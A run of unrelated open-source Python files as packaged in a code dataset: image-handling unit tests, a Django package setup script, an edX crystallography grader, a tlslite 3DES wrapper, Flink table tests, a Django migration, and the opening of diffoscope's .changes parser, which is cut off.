'out_format', 'source', 'dest', run_as_root=False) @mock.patch.object(image_service, 'Service') @mock.patch.object(__builtin__, 'open') def test_fetch_no_image_service(self, open_mock, image_service_mock): mock_file_handle = mock.MagicMock(spec=file) mock_file_handle.__enter__.return_value = 'file' open_mock.return_value = mock_file_handle images.fetch('context', 'image_href', 'path') open_mock.assert_called_once_with('path', 'wb') image_service_mock.assert_called_once_with(version=1, context='context') image_service_mock.return_value.download.assert_called_once_with( 'image_href', 'file') @mock.patch.object(__builtin__, 'open') def test_fetch_image_service(self, open_mock): mock_file_handle = mock.MagicMock(spec=file) mock_file_handle.__enter__.return_value = 'file' open_mock.return_value = mock_file_handle image_service_mock = mock.Mock() images.fetch('context', 'image_href', 'path', image_service_mock) open_mock.assert_called_once_with('path', 'wb') image_service_mock.download.assert_called_once_with( 'image_href', 'file') @mock.patch.object(images, 'image_to_raw') @mock.patch.object(__builtin__, 'open') def test_fetch_image_service_force_raw(self, open_mock, image_to_raw_mock): mock_file_handle = mock.MagicMock(spec=file) mock_file_handle.__enter__.return_value = 'file' open_mock.return_value = mock_file_handle image_service_mock = mock.Mock() images.fetch('context', 'image_href', 'path', image_service_mock, force_raw=True) open_mock.assert_called_once_with('path', 'wb') image_service_mock.download.assert_called_once_with( 'image_href', 'file') image_to_raw_mock.assert_called_once_with( 'image_href', 'path', 'path.part') @mock.patch.object(images, 'qemu_img_info') def test_image_to_raw_no_file_format(self, qemu_img_info_mock): info = self.FakeImgInfo() info.file_format = None qemu_img_info_mock.return_value = info e = self.assertRaises(exception.ImageUnacceptable, images.image_to_raw, 'image_href', 'path', 'path_tmp') qemu_img_info_mock.assert_called_once_with('path_tmp') self.assertIn("'qemu-img info' parsing failed.", str(e)) @mock.patch.object(images, 'qemu_img_info') def test_image_to_raw_backing_file_present(self, qemu_img_info_mock): info = self.FakeImgInfo() info.file_format = 'raw' info.backing_file = 'backing_file' qemu_img_info_mock.return_value = info e = self.assertRaises(exception.ImageUnacceptable, images.image_to_raw, 'image_href', 'path', 'path_tmp') qemu_img_info_mock.assert_called_once_with('path_tmp') self.assertIn("fmt=raw backed by: backing_file", str(e)) @mock.patch.object(os, 'rename') @mock.patch.object(os, 'unlink') @mock.patch.object(images, 'convert_image') @mock.patch.object(images, 'qemu_img_info') def test_image_to_raw(self, qemu_img_info_mock, convert_image_mock, unlink_mock, rename_mock): CONF.set_override('force_raw_images', True) info = self.FakeImgInfo() info.file_format = 'fmt' info.backing_file = None qemu_img_info_mock.return_value = info def convert_side_effect(source, dest, out_format): info.file_format = 'raw' convert_image_mock.side_effect = convert_side_effect images.image_to_raw('image_href', 'path', 'path_tmp') qemu_img_info_mock.assert_has_calls([mock.call('path_tmp'), mock.call('path.converted')]) convert_image_mock.assert_called_once_with('path_tmp', 'path.converted', 'raw') unlink_mock.assert_called_once_with('path_tmp') rename_mock.assert_called_once_with('path.converted', 'path') @mock.patch.object(os, 'unlink') @mock.patch.object(images, 'convert_image') @mock.patch.object(images, 'qemu_img_info') def test_image_to_raw_not_raw_after_conversion(self, qemu_img_info_mock, convert_image_mock, unlink_mock): CONF.set_override('force_raw_images', True) info = self.FakeImgInfo() info.file_format = 'fmt' info.backing_file = None qemu_img_info_mock.return_value = info self.assertRaises(exception.ImageConvertFailed, images.image_to_raw, 'image_href', 'path', 'path_tmp') qemu_img_info_mock.assert_has_calls([mock.call('path_tmp'), mock.call('path.converted')]) convert_image_mock.assert_called_once_with('path_tmp', 'path.converted', 'raw') unlink_mock.assert_called_once_with('path_tmp') @mock.patch.object(os, 'rename') @mock.patch.object(images, 'qemu_img_info') def test_image_to_raw_already_raw_format(self, qemu_img_info_mock, rename_mock): info = self.FakeImgInfo() info.file_format = 'raw' info.backing_file = None qemu_img_info_mock.return_value = info images.image_to_raw('image_href', 'path', 'path_tmp') qemu_img_info_mock.assert_called_once_with('path_tmp') rename_mock.assert_called_once_with('path_tmp', 'path') @mock.patch.object(image_service, 'Service') def test_download_size_no_image_service(self, image_service_mock): images.download_size('context', 'image_href') image_service_mock.assert_called_once_with(version=1, context='context') image_service_mock.return_value.show.assert_called_once_with( 'image_href') def test_download_size_image_service(self): image_service_mock = mock.MagicMock() images.download_size('context', 'image_href', image_service_mock) image_service_mock.show.assert_called_once_with('image_href') @mock.patch.object(images, 'qemu_img_info') def test_converted_size(self, qemu_img_info_mock): info = self.FakeImgInfo() info.virtual_size = 1 qemu_img_info_mock.return_value = info size = images.converted_size('path') qemu_img_info_mock.assert_called_once_with('path') self.assertEqual(1, size) class FsImageTestCase(base.TestCase): @mock.patch.object(shutil, 'copyfile') @mock.patch.object(os, 'makedirs') @mock.patch.object(os.path, 'dirname') @mock.patch.object(os.path, 'exists') def test__create_root_fs(self, path_exists_mock, dirname_mock, mkdir_mock, cp_mock): path_exists_mock_func = lambda path: path == 'root_dir' files_info = { 'a1': 'b1', 'a2': 'b2', 'a3': 'sub_dir/b3'} path_exists_mock.side_effect = path_exists_mock_func dirname_mock.side_effect = ['root_dir', 'root_dir', 'root_dir/sub_dir', 'root_dir/sub_dir'] images._create_root_fs('root_dir', files_info) cp_mock.assert_any_call('a1', 'root_dir/b1') cp_mock.assert_any_call('a2', 'root_dir/b2') cp_mock.assert_any_call('a3', 'root_dir/sub_dir/b3') path_exists_mock.assert_any_call('root_dir/sub_dir') dirname_mock.assert_any_call('root_dir/b1') dirname_mock.assert_any_call('root_dir/b2') dirname_mock.assert_any_call('root_dir/sub_dir/b3') mkdir_mock.assert_called_once_with('root_dir/sub_dir') @mock.patch.object(images, '_create_root_fs') @mock.patch.object(utils, 'tempdir') @mock.patch.object(utils, 'write_to_file') @mock.patch.object(utils, 'dd') @mock.patch.object(utils, 'umount') @mock.patch.object(utils, 'mount') @mock.patch.object(utils, 'mkfs') def test_create_vfat_image(self, mkfs_mock, mount_mock, umount_mock, dd_mock, write_mock, tempdir_mock, create_root_fs_mock): mock_file_handle = mock.MagicMock(spec=file) mock_file_handle.__enter__.return_value = 'tempdir' tempdir_mock.return_value = mock_file_handle parameters = {'p1': 'v1'} files_info = {'a': 'b'} images.create_vfat_image('tgt_file', parameters=parameters, files_info=files_info, parameters_file='qwe', fs_size_kib=1000) dd_mock.assert_called_once_with('/dev/zero', 'tgt_file', 'count=1', 'bs=1000KiB') mkfs_mock.assert_called_once_with('vfat', 'tgt_file') mount_mock.assert_called_once_with('tgt_file', 'tempdir', '-o', 'umask=0') parameters_file_path = os.path.join('tempdir', 'qwe') write_mock.assert_called_once_with(parameters_file_path, 'p1=v1') create_root_fs_mock.assert_called_once_with('tempdir', files_info) umount_mock.assert_called_once_with('tempdir') @mock.patch.object(images, '_create_root_fs') @mock.patch.object(utils, 'tempdir') @mock.patch.object(utils, 'dd') @mock.patch.object(utils, 'umount') @mock.patch.object(utils, 'mount') @mock.patch.object(utils, 'mkfs') def test_create_vfat_image_always_umount(self, mkfs_mock, mount_mock, umount_mock, dd_mock, tempdir_mock, create_root_fs_mock): mock_file_handle = mock.MagicMock(spec=file) mock_file_handle.__enter__.return_value = 'tempdir' tempdir_mock.return_value = mock_file_handle files_info = {'a': 'b'} create_root_fs_mock.side_effect = OSError() self.assertRaises(exception.ImageCreationFailed, images.create_vfat_image, 'tgt_file', files_info=files_info) umount_mock.assert_called_once_with('tempdir') @mock.patch.object(utils, 'dd') def test_create_vfat_image_dd_fails(self, dd_mock): dd_mock.side_effect = processutils.ProcessExecutionError self.assertRaises(exception.ImageCreationFailed, images.create_vfat_image, 'tgt_file') @mock.patch.object(utils, 'tempdir') @mock.patch.object(utils, 'dd') @mock.patch.object(utils, 'mkfs') def test_create_vfat_image_mkfs_fails(self, mkfs_mock, dd_mock, tempdir_mock): mock_file_handle = mock.MagicMock(spec=file) mock_file_handle.__enter__.return_value = 'tempdir' tempdir_mock.return_value = mock_file_handle mkfs_mock.side_effect = processutils.ProcessExecutionError self.assertRaises(exception.ImageCreationFailed, images.create_vfat_image, 'tgt_file') @mock.patch.object(images, '_create_root_fs') @mock.patch.object(utils, 'tempdir') @mock.patch.object(utils, 'dd') @mock.patch.object(utils, 'umount') @mock.patch.object(utils, 'mount') @mock.patch.object(utils, 'mkfs') def test_create_vfat_image_umount_fails(self, mkfs_mock, mount_mock, umount_mock, dd_mock, tempdir_mock, create_root_fs_mock): mock_file_handle = mock.MagicMock(spec=file) mock_file_handle.__enter__.return_value = 'tempdir' tempdir_mock.return_value = mock_file_handle umount_mock.side_effect = processutils.ProcessExecutionError self.assertRaises(exception.ImageCreationFailed, images.create_vfat_image, 'tgt_file') def test__generate_isolinux_cfg(self): kernel_params = ['key1=value1', 'key2'] expected_cfg = ("default boot\n" "\n" "label boot\n" "kernel /vmlinuz\n" "append initrd=/initrd text key1=value1 key2 --") cfg = images._generate_isolinux_cfg(kernel_params) self.assertEqual(expected_cfg, cfg) @mock.patch.object(images, '_create_root_fs') @mock.patch.object(utils, 'write_to_file') @mock.patch.object(utils, 'tempdir') @mock.patch.object(utils, 'execute') @mock.patch.object(images, '_generate_isolinux_cfg') def test_create_isolinux_image(self, gen_cfg_mock, utils_mock, tempdir_mock, write_to_file_mock, create_root_fs_mock): mock_file_handle = mock.MagicMock(spec=file) mock_file_handle.__enter__.return_value = 'tmpdir' tempdir_mock.return_value = mock_file_handle cfg = "cfg" cfg_file = 'tmpdir/isolinux/isolinux.cfg' gen_cfg_mock.return_value = cfg params = ['a=b', 'c'] images.create_isolinux_image('tgt_file', 'path/to/kernel', 'path/to/ramdisk', kernel_params=params) files_info = { 'path/to/kernel': 'vmlinuz', 'path/to/ramdisk': 'initrd', CONF.isolinux_bin: 'isolinux/isolinux.bin' } create_root_fs_mock.assert_called_once_with('tmpdir', files_info) gen_cfg_mock.assert_called_once_with(params) write_to_file_mock.assert_called_once_with(cfg_file, cfg) utils_mock.assert_called_once_with('mkisofs', '-r', '-V', "BOOT IMAGE", '-cache-inodes', '-J', '-l', '-no-emul-boot', '-boot-load-size', '4', '-boot-info-table', '-b', 'isolinux/isolinux.bin', '-o', 'tgt_file', 'tmpdir') @mock.patch.object(images, '_create_root_fs') @mock.patch.object(utils, 'tempdir') @mock.patch.object(utils, 'execute') def test_create_isolinux_image_rootfs_fails(self, utils_mock, tempdir_mock, create_root_fs_mock): create_root_fs_mock.side_effect = IOError self.assertRaises(exception.ImageCreationFailed, images.create_isolinux_image, 'tgt_file', 'path/to/kernel', 'path/to/ramdisk') @mock.patch.object(images, '_create_root_fs') @mock.patch.object(utils, 'write_to_file') @mock.patch.object(utils, 'tempdir') @mock.patch.object(utils, 'execute') @mock.patch.object(images, '_generate_isolinux_cfg') def test_create_isolinux_image_mkisofs_fails(self, gen_cfg_mock, utils_mock, tempdir_mock, write_to_file_mock, create_root_fs_mock): mock_file_handle = mock.MagicMock(spec=file) mock_file_handle.__enter__.return_value = 'tmpdir' tempdir_mock.return_value = mock_file_handle utils_mock.side_effect = processutils.ProcessExecutionError self.assertRaises(exception.ImageCreationFailed, images.create_isolinux_image, 'tgt_file', 'path/to/kernel', 'path/to/ramdisk') @mock.patch.object(images, 'create_isolinux_image') @mock.patch.object(images, 'fetch') @mock.patch.object(utils, 'tempdir') def test_create_boot_iso(self, tempdir_mock, fetch_images_mock, create_isolinux_mock): mock_file_handle = mock.MagicMock(spec=file) mock_file_handle.__enter__.return_value = 'tmpdir' tempdir_mock.return_value = mock_file_handle images.create_boot_iso('ctx', 'output_file', 'kernel-uuid', 'ramdisk-uuid', 'root-uuid', 'kernel-params') fetch_images_mock.assert_any_call('ctx', 'kernel-uuid', 'tmpdir/kernel-uuid', True) fetch_images_mock.assert_any_call('ctx', 'ramdisk-uuid', 'tmpdir/ramdisk-uuid', True) params = ['root=UUID=root-uuid', 'kernel-params'] create_isolinux_mock.assert_called_once_with('output_file', 'tmpdir/kernel-uuid', 'tmpdir/ramdisk-uuid', params) @mock.patch.object(image_service, 'Service') def test_get_glance_image_property(self, image_service_mock): prop_dict = {'properties': {'prop1': 'val1'}} image_service_obj_mock = image_service_mock.return_value image_service_obj_mock.show.return_value = prop_dict ret_val = images.get_glance_image_property('con', 'uuid', 'prop1') image_service_mock.assert_called_once_with(version=1, context='con') image_service_obj_mock.show.assert_called_once_with('uuid') self.assertEqual('val1', ret_val) ret_val = images.get_glance_image_property('con', 'uuid', 'prop2') self.assertIsNone(ret_val) @mock.patch.object(image_service, 'Service') def test_get_temp_url_for_glance_image(self, image_service_mock): direct_url = 'swift+http://host/v1/AUTH_xx/con/obj' image_info = {'id': 'qwe', 'properties': {'direct_url': direct_url}} glance_service_mock = image_service_mock.return_value glance_service_mock.swift_temp_url.return_value = 'temp-url' glance_service_mock.show.return_value = image_info temp_url = images.get_temp_url_for_glance_image('context', 'glance_uuid') glance_service_mock.show.assert_called_once_with('glance_uuid') self.assertEqual('temp-url', temp_url)
apache-2.0
mgpyh/django-fluent-comments
setup.py
1
2800
#!/usr/bin/env python from __future__ import print_function from setuptools import setup, find_packages from os import path import codecs import os import re import sys # When creating the sdist, make sure the django.mo file also exists: if 'sdist' in sys.argv or 'develop' in sys.argv: try: os.chdir('fluent_comments') # from django.core.management.commands.compilemessages import Command # Command.compile_messages(sys.stderr) finally: os.chdir('..') def read(*parts): file_path = path.join(path.dirname(__file__), *parts) return codecs.open(file_path, encoding='utf-8').read() def find_version(*parts): version_file = read(*parts) version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]", version_file, re.M) if version_match: return str(version_match.group(1)) raise RuntimeError("Unable to find version string.") if sys.version_info[0] >= 3: # Akismet 0.2 does not support Python 3. install_requires=[ 'django-crispy-forms>=1.1.1', ] if 'install' in sys.argv: print("\nwarning: skipped Akismet as dependency because it does not have a Python 3 version.") else: install_requires=[ 'django-crispy-forms>=1.1.1', 'akismet>=0.2', ] setup( name='django-fluent-comments', version=find_version('fluent_comments', '__init__.py'), license='Apache License, Version 2.0', install_requires=install_requires, requires=[ 'Django (>=1.3)', # Using staticfiles ], extras_require = { 'threadedcomments': ['django-threadedcomments>=0.9'], }, description='A modern, ajax-based appearance for django_comments', long_description=read('README.rst'), author='Diederik van der Boor', author_email='[email protected]', url='https://github.com/edoburu/django-fluent-comments', download_url='https://github.com/edoburu/django-fluent-comments/zipball/master', packages=find_packages(exclude=('example*',)), include_package_data=True, zip_safe=False, classifiers=[ 'Development Status :: 4 - Beta', 'Environment :: Web Environment', 'Framework :: Django', 'Intended Audience :: Developers', 'License :: OSI Approved :: Apache Software License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 2.6', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3.3', 'Topic :: Internet :: WWW/HTTP', 'Topic :: Internet :: WWW/HTTP :: Dynamic Content', 'Topic :: Software Development :: Libraries :: Application Frameworks', 'Topic :: Software Development :: Libraries :: Python Modules', ] )
apache-2.0
andyzsf/edx
common/lib/chem/chem/miller.py
182
9162
""" Calculation of Miller indices """ import numpy as np import math import fractions as fr import decimal import json def lcm(a, b): """ Returns least common multiple of a, b Args: a, b: floats Returns: float """ return a * b / fr.gcd(a, b) def segment_to_fraction(distance): """ Converts lengths of which the plane cuts the axes to fraction. Tries convert distance to closest nicest fraction with denominator less or equal than 10. It is purely for simplicity and clearance of learning purposes. Jenny: 'In typical courses students usually do not encounter indices any higher than 6'. If distance is not a number (numpy nan), it means that plane is parallel to axis or contains it. Inverted fraction to nan (nan is 1/0) = 0 / 1 is returned Generally (special cases): a) if distance is smaller than some constant, i.g. 0.01011, than fraction's denominator usually much greater than 10. b) Also, if student will set point on 0.66 -> 1/3, so it is 333 plane, But if he will slightly move the mouse and click on 0.65 -> it will be (16,15,16) plane. That's why we are doing adjustments for points coordinates, to the closest tick, tick + tick / 2 value. And now UI sends to server only values multiple to 0.05 (half of tick). Same rounding is implemented for unittests. But if one will want to calculate miller indices with exact coordinates and with nice fractions (which produce small Miller indices), he may want shift to new origin if segments are like S = (0.015, > 0.05, >0.05) - close to zero in one coordinate. He may update S to (0, >0.05, >0.05) and shift origin. In this way he can receive nice small fractions. Also there is can be degenerated case when S = (0.015, 0.012, >0.05) - if update S to (0, 0, >0.05) - it is a line. This case should be considered separately. Small nice Miller numbers and possibility to create very small segments can not be implemented at same time). Args: distance: float distance that plane cuts on axis, it must not be 0. Distance is multiple of 0.05. Returns: Inverted fraction. 0 / 1 if distance is nan """ if np.isnan(distance): return fr.Fraction(0, 1) else: fract = fr.Fraction(distance).limit_denominator(10) return fr.Fraction(fract.denominator, fract.numerator) def sub_miller(segments): ''' Calculates Miller indices from segments. Algorithm: 1. Obtain inverted fraction from segments 2. Find common denominator of inverted fractions 3. Lead fractions to common denominator and throws denominator away. 4. Return obtained values. Args: List of 3 floats, meaning distances that plane cuts on x, y, z axes. Any float not equals zero, it means that plane does not intersect origin, i. e. shift of origin has already been done. Returns: String that represents Miller indices, e.g: (-6,3,-6) or (2,2,2) ''' fracts = [segment_to_fraction(segment) for segment in segments] common_denominator = reduce(lcm, [fract.denominator for fract in fracts]) miller_indices = ([ fract.numerator * math.fabs(common_denominator) / fract.denominator for fract in fracts ]) return'(' + ','.join(map(str, map(decimal.Decimal, miller_indices))) + ')' def miller(points): """ Calculates Miller indices from points. Algorithm: 1. Calculate normal vector to a plane that goes trough all points. 2. Set origin. 3. Create Cartesian coordinate system (Ccs). 4. Find the lengths of segments of which the plane cuts the axes. Equation of a line for axes: Origin + (Coordinate_vector - Origin) * parameter. 5. If plane goes trough Origin: a) Find new random origin: find unit cube vertex, not crossed by a plane. b) Repeat 2-4. c) Fix signs of segments after Origin shift. This means to consider original directions of axes. I.g.: Origin was 0,0,0 and became new_origin. If new_origin has same Y coordinate as Origin, then segment does not change its sign. But if new_origin has another Y coordinate than origin (was 0, became 1), than segment has to change its sign (it now lies on negative side of Y axis). New Origin 0 value of X or Y or Z coordinate means that segment does not change sign, 1 value -> does change. So new sign is (1 - 2 * new_origin): 0 -> 1, 1 -> -1 6. Run function that calculates miller indices from segments. Args: List of points. Each point is list of float coordinates. Order of coordinates in point's list: x, y, z. Points are different! Returns: String that represents Miller indices, e.g: (-6,3,-6) or (2,2,2) """ N = np.cross(points[1] - points[0], points[2] - points[0]) O = np.array([0, 0, 0]) P = points[0] # point of plane Ccs = map(np.array, [[1.0, 0, 0], [0, 1.0, 0], [0, 0, 1.0]]) segments = ([ np.dot(P - O, N) / np.dot(ort, N) if np.dot(ort, N) != 0 else np.nan for ort in Ccs ]) if any(x == 0 for x in segments): # Plane goes through origin. vertices = [ # top: np.array([1.0, 1.0, 1.0]), np.array([0.0, 0.0, 1.0]), np.array([1.0, 0.0, 1.0]), np.array([0.0, 1.0, 1.0]), # bottom, except 0,0,0: np.array([1.0, 0.0, 0.0]), np.array([0.0, 1.0, 0.0]), np.array([1.0, 1.0, 1.0]), ] for vertex in vertices: if np.dot(vertex - O, N) != 0: # vertex not in plane new_origin = vertex break # obtain new axes with center in new origin X = np.array([1 - new_origin[0], new_origin[1], new_origin[2]]) Y = np.array([new_origin[0], 1 - new_origin[1], new_origin[2]]) Z = np.array([new_origin[0], new_origin[1], 1 - new_origin[2]]) new_Ccs = [X - new_origin, Y - new_origin, Z - new_origin] segments = ([np.dot(P - new_origin, N) / np.dot(ort, N) if np.dot(ort, N) != 0 else np.nan for ort in new_Ccs]) # fix signs of indices: 0 -> 1, 1 -> -1 ( segments = (1 - 2 * new_origin) * segments return sub_miller(segments) def grade(user_input, correct_answer): ''' Grade crystallography problem. Returns true if lattices are the same and Miller indices are same or minus same. E.g. (2,2,2) = (2, 2, 2) or (-2, -2, -2). Because sign depends only on student's selection of origin. Args: user_input, correct_answer: json. Format: user_input: {"lattice":"sc","points":[["0.77","0.00","1.00"], ["0.78","1.00","0.00"],["0.00","1.00","0.72"]]} correct_answer: {'miller': '(00-1)', 'lattice': 'bcc'} "lattice" is one of: "", "sc", "bcc", "fcc" Returns: True or false. ''' def negative(m): """ Change sign of Miller indices. Args: m: string with meaning of Miller indices. E.g.: (-6,3,-6) -> (6, -3, 6) Returns: String with changed signs. """ output = '' i = 1 while i in range(1, len(m) - 1): if m[i] in (',', ' '): output += m[i] elif m[i] not in ('-', '0'): output += '-' + m[i] elif m[i] == '0': output += m[i] else: i += 1 output += m[i] i += 1 return '(' + output + ')' def round0_25(point): """ Rounds point coordinates to closest 0.5 value. Args: point: list of float coordinates. Order of coordinates: x, y, z. Returns: list of coordinates rounded to closes 0.5 value """ rounded_points = [] for coord in point: base = math.floor(coord * 10) fractional_part = (coord * 10 - base) aliquot0_25 = math.floor(fractional_part / 0.25) if aliquot0_25 == 0.0: rounded_points.append(base / 10) if aliquot0_25 in (1.0, 2.0): rounded_points.append(base / 10 + 0.05) if aliquot0_25 == 3.0: rounded_points.append(base / 10 + 0.1) return rounded_points user_answer = json.loads(user_input) if user_answer['lattice'] != correct_answer['lattice']: return False points = [map(float, p) for p in user_answer['points']] if len(points) < 3: return False # round point to closes 0.05 value points = [round0_25(point) for point in points] points = [np.array(point) for point in points] # print miller(points), (correct_answer['miller'].replace(' ', ''), # negative(correct_answer['miller']).replace(' ', '')) if miller(points) in (correct_answer['miller'].replace(' ', ''), negative(correct_answer['miller']).replace(' ', '')): return True return False
agpl-3.0
RockySteveJobs/python-for-android
python-build/python-libs/gdata/build/lib/gdata/tlslite/utils/OpenSSL_TripleDES.py
359
1666
"""OpenSSL/M2Crypto 3DES implementation.""" from cryptomath import * from TripleDES import * if m2cryptoLoaded: def new(key, mode, IV): return OpenSSL_TripleDES(key, mode, IV) class OpenSSL_TripleDES(TripleDES): def __init__(self, key, mode, IV): TripleDES.__init__(self, key, mode, IV, "openssl") self.key = key self.IV = IV def _createContext(self, encrypt): context = m2.cipher_ctx_new() cipherType = m2.des_ede3_cbc() m2.cipher_init(context, cipherType, self.key, self.IV, encrypt) return context def encrypt(self, plaintext): TripleDES.encrypt(self, plaintext) context = self._createContext(1) ciphertext = m2.cipher_update(context, plaintext) m2.cipher_ctx_free(context) self.IV = ciphertext[-self.block_size:] return ciphertext def decrypt(self, ciphertext): TripleDES.decrypt(self, ciphertext) context = self._createContext(0) #I think M2Crypto has a bug - it fails to decrypt and return the last block passed in. #To work around this, we append sixteen zeros to the string, below: plaintext = m2.cipher_update(context, ciphertext+('\0'*16)) #If this bug is ever fixed, then plaintext will end up having a garbage #plaintext block on the end. That's okay - the below code will ignore it. plaintext = plaintext[:len(ciphertext)] m2.cipher_ctx_free(context) self.IV = ciphertext[-self.block_size:] return plaintext
apache-2.0
apache/flink
flink-python/pyflink/table/tests/test_correlate.py
5
4123
################################################################################ # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ################################################################################ from pyflink.table import expressions as expr from pyflink.testing.test_case_utils import PyFlinkStreamTableTestCase class CorrelateTests(PyFlinkStreamTableTestCase): def test_join_lateral(self): t_env = self.t_env t_env.create_java_temporary_system_function("split", "org.apache.flink.table.legacyutils.TableFunc1") source = t_env.from_elements([("1", "1#3#5#7"), ("2", "2#4#6#8")], ["id", "words"]) result = source.join_lateral("split(words) as (word)") query_operation = result._j_table.getQueryOperation() self.assertEqual('INNER', query_operation.getJoinType().toString()) self.assertTrue(query_operation.isCorrelated()) self.assertEqual('true', query_operation.getCondition().toString()) def test_join_lateral_with_join_predicate(self): t_env = self.t_env t_env.create_java_temporary_system_function("split", "org.apache.flink.table.legacyutils.TableFunc1") source = t_env.from_elements([("1", "1#3#5#7"), ("2", "2#4#6#8")], ["id", "words"]) result = source.join_lateral(expr.call('split', source.words).alias('word'), expr.col('id') == expr.col('word')) query_operation = result._j_table.getQueryOperation() self.assertEqual('INNER', query_operation.getJoinType().toString()) self.assertTrue(query_operation.isCorrelated()) self.assertEqual('equals(id, word)', query_operation.getCondition().toString()) def test_left_outer_join_lateral(self): t_env = self.t_env t_env.create_java_temporary_system_function("split", "org.apache.flink.table.legacyutils.TableFunc1") source = t_env.from_elements([("1", "1#3#5#7"), ("2", "2#4#6#8")], ["id", "words"]) result = source.left_outer_join_lateral(expr.call('split', source.words).alias('word')) query_operation = result._j_table.getQueryOperation() self.assertEqual('LEFT_OUTER', query_operation.getJoinType().toString()) self.assertTrue(query_operation.isCorrelated()) self.assertEqual('true', query_operation.getCondition().toString()) def test_left_outer_join_lateral_with_join_predicate(self): t_env = self.t_env t_env.create_java_temporary_system_function("split", "org.apache.flink.table.legacyutils.TableFunc1") source = t_env.from_elements([("1", "1#3#5#7"), ("2", "2#4#6#8")], ["id", "words"]) # only support "true" as the join predicate currently result = source.left_outer_join_lateral(expr.call('split', source.words).alias('word'), expr.lit(True)) query_operation = result._j_table.getQueryOperation() self.assertEqual('LEFT_OUTER', query_operation.getJoinType().toString()) self.assertTrue(query_operation.isCorrelated()) self.assertEqual('true', query_operation.getCondition().toString())
apache-2.0
peterbarkley/SurfGeckos
djangosite/snippets/migrations/0012_auto_20170917_2131.py
1
2390
# -*- coding: utf-8 -*- # Generated by Django 1.11.5 on 2017-09-18 07:31 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('snippets', '0011_auto_20170917_2103'), ] operations = [ migrations.AlterField( model_name='actionlevel', name='aquatic_ecotoxicity', field=models.FloatField(blank=True, null=True), ), migrations.AlterField( model_name='actionlevel', name='direct_exposure', field=models.FloatField(blank=True, null=True), ), migrations.AlterField( model_name='actionlevel', name='dw_toxicity', field=models.FloatField(blank=True, null=True, verbose_name='Drinking Water Toxicity'), ), migrations.AlterField( model_name='actionlevel', name='gw_gross_contamination', field=models.FloatField(blank=True, null=True, verbose_name='Groundwater Gross Contamination'), ), migrations.AlterField( model_name='actionlevel', name='gw_vapor_emissions', field=models.FloatField(blank=True, null=True, verbose_name='Groundwater Vapor Emissions'), ), migrations.AlterField( model_name='actionlevel', name='indoor_air', field=models.FloatField(blank=True, null=True), ), migrations.AlterField( model_name='actionlevel', name='leaching', field=models.FloatField(blank=True, null=True), ), migrations.AlterField( model_name='actionlevel', name='shallow_soil_vapor', field=models.FloatField(blank=True, null=True), ), migrations.AlterField( model_name='actionlevel', name='soil_gross_contamination', field=models.FloatField(blank=True, null=True), ), migrations.AlterField( model_name='actionlevel', name='soil_vapor_emissions', field=models.FloatField(blank=True, null=True), ), migrations.AlterField( model_name='actionlevel', name='terrestrial_ecotoxicity', field=models.FloatField(blank=True, null=True), ), ]
mit
anthraxx/diffoscope
diffoscope/changes.py
2
11351
# -*- coding: utf-8 -*- # # changes.py — .changes file handling class # # This file was originally part of debexpo # https://alioth.debian.org/projects/debexpo/ # # Copyright © 2008 Jonny Lamb <[email protected]> # Copyright © 2010 Jan Dittberner <[email protected]> # Copyright © 2012 Arno Töll <[email protected]> # Copyright © 2012 Paul Tagliamonte <[email protected]> # Copyright © 2014 Jérémy Bobbio <[email protected]> # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation # files (the "Software"), to deal in the Software without # restriction, including without limitation the rights to use, # copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following # conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES # OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT # HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR # OTHER DEALINGS IN THE SOFTWARE. """ This code deals with the reading and processing of Debian .changes files. This code is copyright (c) Jonny Lamb, and is used by dput, rather then created as a result of it. Thank you Jonny. """ __author__ = 'Jonny Lamb' __copyright__ = 'Copyright © 2008 Jonny Lamb, Copyright © 2010 Jan Dittberner' __license__ = 'MIT' import os.path import hashlib import logging import subprocess from debian import deb822 from .tools import tool_required logger = logging.getLogger(__name__) class ChangesFileException(Exception): pass class Changes(object): """ Changes object to help process and store information regarding Debian .changes files, used in the upload process. """ def __init__(self, filename=None, string=None): """ Object constructor. The object allows the user to specify **either**: #. a path to a *changes* file to parse #. a string with the *changes* file contents. :: a = Changes(filename='/tmp/packagename_version.changes') b = Changes(string='Source: packagename\\nMaintainer: ...') ``filename`` Path to *changes* file to parse. ``string`` *changes* file in a string to parse. """ if (filename and string) or (not filename and not string): raise TypeError if filename: self._absfile = os.path.abspath(filename) self._directory = os.path.dirname(self._absfile) self._data = deb822.Changes(open(filename, encoding='utf-8')) self.basename = os.path.basename(filename) else: self._data = deb822.Changes(string) if len(self._data) == 0: raise ChangesFileException('Changes file could not be parsed.') def get_filename(self): """ Returns the filename from which the changes file was generated from. Please do note this is just the basename, not the entire full path, or even a relative path. For the absolute path to the changes file, please see :meth:`get_changes_file`. """ return self.basename def get_changes_file(self): """ Return the full, absolute path to the changes file. For just the filename, please see :meth:`get_filename`. """ return os.path.join(self._directory, self.get_filename()) def get_path(self, filename): """ Return the full, absolute path to a file referenced by the changes file. """ return os.path.join(self._directory, filename) def get_files(self): """ Returns a list of files referenced in the changes file, such as the .dsc, .deb(s), .orig.tar.gz, and 